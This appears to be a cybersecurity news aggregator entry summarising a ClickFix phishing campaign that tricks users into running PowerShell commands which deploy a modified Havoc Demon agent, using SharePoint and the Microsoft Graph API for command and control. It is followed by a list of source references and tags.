CyberSecurity news
FlagThis
@cyberalerts.io
//
A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands, which subsequently deploy the Havok post-exploitation framework. This framework grants attackers remote access to compromised devices. The attackers cleverly conceal the different stages of their malware within SharePoint sites and employ a modified version of Havoc Demon in tandem with the Microsoft Graph API. This tactic is used to obfuscate command-and-control (C2) communications, making them appear as legitimate traffic within trusted Microsoft services.
The attack starts with a phishing email that has a HTML attachment, when opened, displays an error message, which uses the ClickFix technique to trick users into copying and executing a malicious PowerShell command into their terminal or PowerShell, thereby triggering the next-stage. The command downloads and executes a PowerShell script hosted on a server controlled by the attacker. This script checks for sandboxed environments, downloads the Python interpreter if needed, and executes a Python script serving as a shellcode loader for KaynLdr, launching the Havoc Demon agent on the infected host.
ImgSrc: blogger.googleu
References :
The attack starts with a phishing email that has a HTML attachment, when opened, displays an error message, which uses the ClickFix technique to trick users into copying and executing a malicious PowerShell command into their terminal or PowerShell, thereby triggering the next-stage. The command downloads and executes a PowerShell script hosted on a server controlled by the attacker. This script checks for sandboxed environments, downloads the Python interpreter if needed, and executes a Python script serving as a shellcode loader for KaynLdr, launching the Havoc Demon agent on the infected host.
ImgSrc: blogger.googleu
Share:
References :
- bsky.app: A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havok post-exploitation framework for remote access to compromised devices.
- thehackernews.com: Hackers Use ClickFix Trick to Deploy PowerShell-Based Havoc C2 via SharePoint Sites
- BleepingComputer: BleepingComputer post about a new ClickFix phishing campaign.
- Anonymous ???????? :af:: A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havok post-exploitation framework for remote access to compromised devices.
- Talkback Resources: Hackers Use ClickFix Trick to Deploy PowerShell-Based Havoc C2 via SharePoint Sites [social] [mal]
- bsky.app: A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havok post-exploitation framework for remote access to compromised devices.
- Virus Bulletin: Virus Bulletin covers campaign combining ClickFix & multi-stage malware to deploy a modified Havoc Demon Agent.
- Email Security - Blog: Cyber security researchers have discovered a new and sophisticated cyber attack campaign that’s predicated on social engineering and remote access tool use.
Classification:
- HashTags: #ClickFix #HavocC2 #PhishingCampaign
- Company: Microsoft
- Target: Windows Users
- Product: SharePoint
- Feature: Malicious PowerShell execution
- Malware: Havoc
- Type: Hack
- Severity: Major